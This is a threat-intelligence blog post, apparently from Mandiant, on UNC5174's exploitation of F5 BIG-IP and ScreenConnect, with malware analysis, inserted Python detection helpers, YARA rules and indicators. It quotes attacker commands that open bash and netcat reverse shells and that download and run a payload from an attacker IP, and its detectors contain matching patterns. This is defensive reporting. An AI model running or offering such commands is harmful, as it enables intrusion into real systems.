https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect
Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect

Mandiant Blog
Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen
Mar 21, 2024 | 14 min read | Last updated: Mar 22, 2024
Incident Response | Threat Intelligence | China | Vulnerabilities

During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting the F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of ConnectWise ScreenConnect CVE-2024-1709 by the same actor. The mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.

Mandiant assesses that UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives who has since shown indications of acting as a contractor for China's Ministry of State Security (MSS), focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting the ConnectWise ScreenConnect vulnerability (CVE-2024-1709) to compromise hundreds of institutions, primarily in the U.S. and Canada.

TARGETING AND TIMELINE

UNC5174 has been linked to widespread, aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024. The actor appears primarily focused on executing access operations.
Mandiant observed UNC5174 exploiting the following vulnerabilities during this time:

* ConnectWise ScreenConnect vulnerability CVE-2024-1709
* F5 BIG-IP Configuration Utility authentication bypass vulnerability CVE-2023-46747
* Atlassian Confluence CVE-2023-22518
* Linux kernel vulnerability CVE-2022-0185
* Zyxel firewall OS command injection vulnerability CVE-2022-30525

Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong. Additionally, key strategic targets such as think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.

Figure 1: UNC5174 global targeting map

INITIAL DISCLOSURE OF CVE-2023-46747

On Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (CVE-2023-46747) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed the steps required for successful exploitation: Apache JServ Protocol (AJP) request smuggling is used to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH).

Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The advisory detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends that organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.
EVIDENCE OF EXPLOITATION

Mandiant identified UNC5174 compromising F5 BIG-IP appliances that exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance such as account creation.

The anomalous behavior appeared first in the "/var/log/audit" log file, which recorded the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:

* /etc/passwd
* /etc/shadow
* /home/<username> (the user's home directory was also created)

Table 1: Compromised host audit log. Note that the compromised appliance recorded timestamps in local time.

Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 01420002:5: AUDIT - pid=30629 user=root folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 password **** shell bash partition-access add { all-partitions { role admin } }
Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c id

The "/var/log/restjavad-audit.log" file recorded evidence of malicious requests to the REST API, including the user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "f5support3". The following log entries show the f5support3 user executing bash commands; the body of the POST request contains the bash command being executed.
Table 2: UNC5174 bash commands executed with the newly created username f5support3

[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}
[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}

UNC5174 then created further accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:

* F5support3
* F5_admin
* f5_support

POST-EXPLOITATION TACTICS BY UNC5174 AFTER SUCCESSFUL ACCOUNT CREATION

SNOWLIGHT, GOHEAVY, GOREVERSE, AND SUPERSHELL

UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named SNOWLIGHT. The following chained bash commands attributed to UNC5174 perform these actions related to SNOWLIGHT:

1. Delete any file previously written to /tmp/watchsys.
2. Forcefully kill the process "watchsys" if it is running.
3. Download the file from a remote URL to /tmp/watchsys.
4. Modify the permissions of /tmp/watchsys to allow execution.
5. Execute /tmp/watchsys using "nohup", so that the process continues running after the parent process is terminated.
6. Perform a directory listing of the /tmp directory.
Table 3: UNC5174 cURL command to download the SNOWLIGHT downloader

Nov 2 07:29:47 localhost.localdomain notice icrd_child[17602]: 01420002:5: AUDIT - pid=17602 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &;ls -al /tmp/"

Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method

SNOWLIGHT is a downloader written in C and designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the single-byte key 0x99. Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payload's process runs under the hard-coded name "". This is identifiable in a running process list as a "memfd" process.

The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in memory via the previously described memfd method. The following GOHEAVY process-related artifacts were observed on the compromised F5 appliance:

* Process name: memfd:a (deleted)
* Path: empty (because the executable is not backed by a file on disk)
* Args: ?
* User: root

GOREVERSE is a publicly available reverse shell backdoor written in Go that operates over Secure Shell (SSH).
Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.

Table 4: UNC5174 command to launch a bash reverse shell

Nov 2 07:16:15 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0>&1 &"

Table 5: UNC5174 command to launch a netcat reverse shell

Nov 2 07:30:37 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "nc 172.104.124[.]74 443 -e /bin/bash &"

INTERNAL RECONNAISSANCE

Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" with cURL, both from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads and from GitHub.

Table 6: UNC5174 commands downloading unidentified additional tooling suspected of internal reconnaissance functionality

curl -o /tmp/ss hxxp://172[.]104.124.74/App-amd64linux-noupx
curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases/download/v1.2.5/App-amd64linux-noupx

The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub repository https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions.
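Two triage helpers for the SNOWLIGHT loading behaviour described above, written for this page as an added example (this is not Mandiant's code). The first undoes the single-byte 0x99 XOR on a captured second-stage blob and confirms the result is an ELF image; the second scans a /proc-style listing for processes whose executable link resolves to a deleted memfd, which is how the "memfd:a (deleted)" artifact above appears on a live host. The sample stage-2 image and the /proc snapshot are constructed; `snapshot_proc` reads a real /proc on Linux and is the only part that touches the host.

```python
"""Triage helpers for SNOWLIGHT-style in-memory payloads (added example, not Mandiant's code).

SNOWLIGHT fetches a second-stage ELF over TCP/443, XOR-decodes it with the
single-byte key 0x99, writes it to an anonymous file from memfd_create() and
runs it with fexecve(). Two things a responder can do with that knowledge:

  * decode_snowlight_payload(): given the raw blob captured on the wire, undo
    the XOR and check that the result is an ELF image.
  * find_memfd_processes(): on the appliance, a process started this way has
    /proc/<pid>/exe pointing at "/memfd:<name> (deleted)" and no on-disk path.

The sample stage-2 image and the /proc snapshot below are constructed.
"""
import os
import re
from dataclasses import dataclass

SNOWLIGHT_XOR_KEY = 0x99
ELF_MAGIC = b"\x7fELF"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


def looks_like_snowlight_stage2(blob: bytes) -> bool:
    """Cheap classifier for a wire capture: does XOR-0x99 of the first bytes give an ELF header?"""
    return xor_bytes(blob[:4], SNOWLIGHT_XOR_KEY) == ELF_MAGIC


def decode_snowlight_payload(blob: bytes) -> bytes:
    """Decode a captured SNOWLIGHT stage-2 blob and verify the ELF magic.

    If the key is wrong, or the capture is not the stage-2 transfer, the first
    four decoded bytes will not be \\x7fELF and we refuse to return garbage.
    """
    decoded = xor_bytes(blob, SNOWLIGHT_XOR_KEY)
    if not decoded.startswith(ELF_MAGIC):
        raise ValueError("decoded data does not start with the ELF magic; wrong key or wrong blob")
    return decoded


@dataclass(frozen=True)
class ProcEntry:
    pid: int
    exe: str      # target of readlink("/proc/<pid>/exe")
    cmdline: str
    uid: int


# A memfd-backed executable shows up as "/memfd:<name> (deleted)"; the name may be empty.
MEMFD_EXE_RE = re.compile(r"^/memfd:(?P<name>.*?) \(deleted\)$")


def find_memfd_processes(entries) -> list:
    """Return the entries whose executable is an anonymous (memfd) file.

    Some legitimate software also uses memfd (JIT runtimes, some desktop
    components), so hits are leads to examine, not convictions. On an F5
    appliance, a root process with an empty or one-letter memfd name is
    exactly the artifact described in the post.
    """
    hits = []
    for entry in entries:
        m = MEMFD_EXE_RE.match(entry.exe)
        if m:
            hits.append({"pid": entry.pid, "memfd_name": m.group("name"),
                         "uid": entry.uid, "cmdline": entry.cmdline})
    return hits


def snapshot_proc(proc_root: str = "/proc") -> list:
    """Build ProcEntry records from a live Linux /proc (run as root to see every process)."""
    entries = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        base = os.path.join(proc_root, name)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\x00", b" ").decode(errors="replace").strip()
            uid = os.stat(base).st_uid
        except OSError:
            continue  # process exited, or no permission to read it
        entries.append(ProcEntry(int(name), exe, cmdline, uid))
    return entries


# --- constructed sample data -------------------------------------------------
# A 64-byte ELF64 header (x86-64, ET_EXEC) is enough to exercise the decoder.
SAMPLE_STAGE2 = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(8)    # e_ident
    + b"\x02\x00\x3e\x00\x01\x00\x00\x00"     # e_type, e_machine, e_version
    + bytes(40)                                # remaining header fields, zeroed
)
SAMPLE_BLOB = xor_bytes(SAMPLE_STAGE2, SNOWLIGHT_XOR_KEY)   # what the wire would carry

SAMPLE_PROC = [  # constructed snapshot; pid 4471 mirrors the "memfd:a (deleted)" artifact
    ProcEntry(1, "/usr/lib/systemd/systemd", "/usr/lib/systemd/systemd", 0),
    ProcEntry(18778, "/usr/bin/icrd_child", "/usr/bin/icrd_child", 0),
    ProcEntry(4471, "/memfd:a (deleted)", "a", 0),
    ProcEntry(4490, "/tmp/watchsys", "/tmp/watchsys", 0),
]


if __name__ == "__main__":
    assert decode_snowlight_payload(SAMPLE_BLOB) == SAMPLE_STAGE2
    for hit in find_memfd_processes(SAMPLE_PROC):
        print(f"pid={hit['pid']} uid={hit['uid']} memfd_name={hit['memfd_name']!r} cmdline={hit['cmdline']!r}")
```

On a live appliance, `find_memfd_processes(snapshot_proc())` gives the same dictionaries for real processes; the MD5 of a hit can be taken from `/proc/<pid>/exe` directly, since the anonymous file is still readable through that link even though it has no path.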
Execution of "/tmp/ss" was recorded in shell history, and the command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance, consistent with the tool FSCAN (https://github.com/shadow1ng/fscan).

Table 7: UNC5174 command to scan internal subnet ranges from the compromised F5 appliance

./ss -i <Internal CIDR block>

GOHEAVY TUNNELER: A CLOSER LOOK

UNC5174 employs a Go-based tunneler named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. The tool leverages the Gin framework to manage traffic routing functionality. Mandiant observed GOHEAVY communicating simultaneously with an external C2 server operated by SUPERSHELL administrators while opening and listening on a large number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces. This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks; the continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network.

In addition to GOHEAVY, Mandiant observed various other tools common in red teaming, including:

* SLIVER client
* FFUFP
* SQLMAP
* DIRBUSTER
* METASPLOIT
* AFROG penetration testing tool
* NUCLEI vulnerability scanning templates

UNC5174 CLOSES THE DOOR BEHIND THEM

Mandiant observed unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using the F5-provided mitigation script "mitigation.sh". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional, unrelated threat actors attempting to access the appliance.
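A detection pass over the two appliance logs quoted in Tables 1 through 5, extended with the self-patch behaviour just described, as an added example (not Mandiant's code and not a Mandiant detection). The audit-log sample is built from the entries in those tables with the defanged IPs restored, plus one constructed benign entry and a constructed mitigation.sh entry; the restjavad sample is built the same way with one constructed benign GET. Rule names, severities and the trusted-source list are choices made for this example.

```python
"""Detection pass over F5 BIG-IP audit artifacts (added example, not Mandiant's code).

Sources:
  * /var/log/audit               - tmsh/iControl lines "AUDIT - ... cmd_data=..."
  * /var/log/restjavad-audit.log - one JSON record per REST request

Rules encode what the tables above show: admin-role account creation, shell
access through "run util bash", reverse-shell and download-to-/tmp patterns in
those shell commands, the actor's self-patch with mitigation.sh, and REST
writes to the bash utility / user endpoints from a non-loopback source.
"""
import json
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    ts: str
    user: str
    detail: str


AUDIT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ notice (?P<proc>\w+)\[\d+\]: \S+ AUDIT - "
    r"pid=\d+ user=(?P<user>\S+) folder=\S+ module=\S+ status=\[(?P<status>[^\]]+)\] cmd_data=(?P<cmd>.*)$"
)
CREATE_USER_RE = re.compile(r"^create auth user (?P<name>\S+)")
# bash /dev/tcp redirection, or nc/ncat handing a shell to the remote side
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|\b(?:nc|ncat)\b[^;|]*-e\s*/bin/(?:ba)?sh")
# curl/wget writing into /tmp, as in the SNOWLIGHT and /tmp/ss downloads
TMP_DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^;|]*\s-[oO]\s*/tmp/")


def analyze_audit_log(text: str) -> list:
    """Apply the tmsh-level rules to /var/log/audit content, in file order."""
    findings = []
    created = set()   # accounts created earlier in this log; shell use by them is high severity
    for line in text.splitlines():
        m = AUDIT_RE.match(line)
        if not m:
            continue
        ts, user, cmd = m["ts"], m["user"], m["cmd"]
        cm = CREATE_USER_RE.match(cmd)
        if cm:
            created.add(cm["name"])
            findings.append(Finding("CREATE_USER", "high" if "role admin" in cmd else "medium", ts, user, cmd))
        if cmd.startswith("run util bash"):
            findings.append(Finding("BASH_VIA_TMSH", "high" if user in created else "medium", ts, user, cmd))
            if REVERSE_SHELL_RE.search(cmd):
                findings.append(Finding("REVERSE_SHELL", "critical", ts, user, cmd))
            if TMP_DOWNLOAD_RE.search(cmd):
                findings.append(Finding("TMP_DOWNLOAD", "high", ts, user, cmd))
            if "mitigation.sh" in cmd:   # an attacker applying the vendor fix after getting in
                findings.append(Finding("SELF_PATCH", "high", ts, user, cmd))
    return findings


REST_RE = re.compile(r"^\[\w\]\[\d+\]\[(?P<ts>[^\]]+)\]\[\w+\] (?P<json>\{.*\})$")
SENSITIVE_PATHS = ("/mgmt/tm/util/bash", "/mgmt/shared/authz/users")


def analyze_rest_log(text: str, trusted_sources=("127.0.0.1", "::1")) -> list:
    """Flag REST writes to the bash utility and user-management endpoints."""
    findings = []
    for line in text.splitlines():
        m = REST_RE.match(line)
        if not m:
            continue
        try:
            rec = json.loads(m["json"])
        except json.JSONDecodeError:
            continue
        path = urlsplit(rec.get("uri", "")).path
        method, src = rec.get("method", ""), rec.get("from", "")
        if method in ("POST", "PATCH", "PUT") and path.startswith(SENSITIVE_PATHS):
            sev = "high" if src not in trusted_sources else "medium"
            findings.append(Finding("REST_SENSITIVE_WRITE", sev, m["ts"], rec.get("user", ""), f"{method} {path} from {src}"))
    return findings


def rule_counts(findings) -> dict:
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# --- constructed samples: Tables 1-5 with IPs restored, plus one benign line and the mitigation.sh line
SAMPLE_AUDIT_LOG = """\
Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 01420002:5: AUDIT - pid=30629 user=root folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 password **** shell bash partition-access add { all-partitions { role admin } }
Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c id
Oct 28 09:00:00 localhost.localdomain notice tmsh[4100]: 01420002:5: AUDIT - pid=4100 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=list ltm virtual
Oct 28 14:27:35 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c /root/mitigation.sh -u
Nov 2 07:16:15 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0>&1 &"
Nov 2 07:29:47 localhost.localdomain notice icrd_child[17602]: 01420002:5: AUDIT - pid=17602 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys http://172.104.124.74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &;ls -al /tmp/"
Nov 2 07:30:37 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "nc 172.104.124.74 443 -e /bin/bash &"
"""
SAMPLE_REST_LOG = """\
[I][8601][27 Oct 2023 14:50:00 UTC][ForwarderPassThroughWorker] {"user":"local/admin","method":"GET","uri":"http://localhost:8100/mgmt/tm/ltm/virtual","status":200,"from":"127.0.0.1"}
[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200,"from":"154.12.177.8"}
[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177.8"}
"""

if __name__ == "__main__":
    for f in analyze_audit_log(SAMPLE_AUDIT_LOG) + analyze_rest_log(SAMPLE_REST_LOG):
        print(f"[{f.severity:8}] {f.rule:20} {f.ts:24} user={f.user:18} {f.detail}")
```

Every "run util bash" is reported, not just the ones matching a payload pattern: on a BIG-IP the REST bash utility is rarely part of normal administration, and the actor's own commands in Tables 3 through 5 ran as the built-in "admin" account, so a rule keyed only on newly created users would have missed them.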
The following additional commands were observed during their initial access on the compromised appliance:

* bash execution via CVE-2023-46747, command run for account root6 from 61.239.68.73 (HK)
* 28/10 14:16:23: deleted user root6
* 28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u
* 4/11/2023 03:36:30: /tmp/.del

UNC5174 TARGETS SCREENCONNECT VULNERABILITY

On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations. Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence that the other organizations listed by uteus were also compromised.

Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting

ATTRIBUTION

Mandiant has identified a new access operations group, UNC5174, that uses the persona "Uteus" (alternate spelling "uetus") on underground forums and that we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives, including "Dawn Calvary" and "Genesis Day", prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for-profit intrusions.

CHINESE HACKTIVISTS, UNC302, AND UNC5174 LINK TO MSS CONTRACTORS

Mandiant assesses that UNC5174 (aka Uteus) was previously a member of the Chinese hacktivist collective "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake."
This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments. As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by the distinct, known MSS access broker UNC302, which was previously indicted by the U.S. Department of Justice in 2020.

On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address associated with several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and a UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of the Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a public proof of concept to perform activities on compromised systems.

Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed not to be employed by the Chinese government in a Telegram channel operated by the group.

Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government

Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems.
While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302 which suggest they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.

OUTLOOK AND IMPLICATIONS

UNC5174's exploitation of CVE-2023-46747 as an N-day vulnerability, in tandem with its recent exploitation of the ConnectWise ScreenConnect vulnerability CVE-2024-1709, demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors, specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.

REMEDIATION AND HARDENING

Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:

* Restrict access to the F5 TMUI from the internet.
* Immediately apply the F5 mitigation script published in K000137353 to any vulnerable F5 appliances.
* Investigate vulnerable F5 appliances for evidence of compromise.

In the event of F5 compromise:

* Review appliance configurations for unauthorized modifications.
* Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.
* Consider revoking and re-issuing sensitive cryptographic material, such as certificates and private keys, that may have been accessible to a threat actor.

For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller read our latest ScreenConnect remediation and hardening guide.

INDICATORS OF COMPROMISE (IOCS)

NETWORK IOCS

IP Address | ASN | NetBlock | Location
118.140.151[.]242 | 9304 | HGC Global Communications Limited | HK
61.239.68[.]73 | 9269 | Hong Kong Broadband Network Ltd. | HK
172.245.68[.]110 | 36352 | Colocrossing | U.S.

URLS

URL | Description
http://172.245.68[.]110:8888 | SUPERSHELL C2

HOST IOCS

MD5 Hash | Filename | Type | Code family
c867881c56698f938b4e8edafe76a09b | LG | ELF | SNOWLIGHT
df4603548b10211f0aa77d0e9a172438 | N/A | ELF | SNOWLIGHT
0951109dd1be0d84a33d52c135ba9c97 | N/A | ELF | SNOWLIGHT
9c3bf506dd19c08c0ed3af9c1708a770 | memfd:a | ELF | N/A
0ba435460fb7622344eec28063274b8a | undefined | ELF | SNOWLIGHT
a78bf3d16349eba86719539ee8ef562d | N/A | ELF | SNOWLIGHT

HOST BASED INDICATORS (COMMANDS)

cmd_data=run util bash -c "echo dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= | base64 -d | sh"
(the base64 decodes to: tmsh -q -c 'cd /;show running-config recursive')

run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0>&1 &"

DETECTIONS

rule M_Backdoor_GOREVERSE_2
{
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect events related to goreverse. GOREVERSE is a publicly available reverse shell"
        md5 = "5c175ea3664279d6c0c2609844de6949"
        platforms = "Windows,Linux,MacOS"
        malware_family = "GOREVERSE"
    strings:
        $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B [5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
        $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
        $cc_rssh = "rssh" fullword
        $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 [1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
        $str1 = "--[foreground|fingerprint|proxy|process_name] -d|--destination <server_address>"
        $str2 = "-d or --destination Server connect back address (can be baked in)"
        $str3 = "--foreground Causes the client to run without forking to background"
        $str4 = "--fingerprint Server public key SHA256 hex fingerprint for auth"
        $str5 = "--proxy Location of HTTP connect proxy to use"
        $str6 = "--process_name Process name shown in tasklist/process list"
    condition:
        (
            ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe))
            or (uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550)
            or (uint32(0) == 0x464c457f)
        )
        and (all of ($str*) or all of ($cc_*))
}

rule M_APT_Downloader_SNOWLIGHT_1
{
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect the SNOWLIGHT code family"
        md5 = "0951109dd1be0d84a33d52c135ba9c97"
        platforms = "Linux"
        malware_family = "SNOWLIGHT"
    strings:
        $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 7C F2 48 63 D2 48 89 EE 44 89 E7 }
        $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 00 BF 3F 01 00 00 E8 8C FE FF FF }
    condition:
        uint32(0) == 0x464c457f and all of them
}

MANDIANT SECURITY VALIDATION ACTIONS

Organizations can validate their security controls using the following actions with Mandiant Security Validation.
Table 8: Mandiant Security Validation actions

VID | Name
A106-917 | Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation
A106-916 | Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication
A107-059 | Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1
A107-056 | Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1

MITRE ATT&CK

Mandiant has observed UNC5174 use the following techniques:

Initial Access
* T1190 Exploit Public-Facing Application

Defense Evasion
* T1027 Obfuscated Files or Information
* T1070.004 File Deletion
* T1140 Deobfuscate/Decode Files or Information
* T1222.002 Linux and Mac File and Directory Permissions Modification
* T1601.001 Patch System Image

Discovery
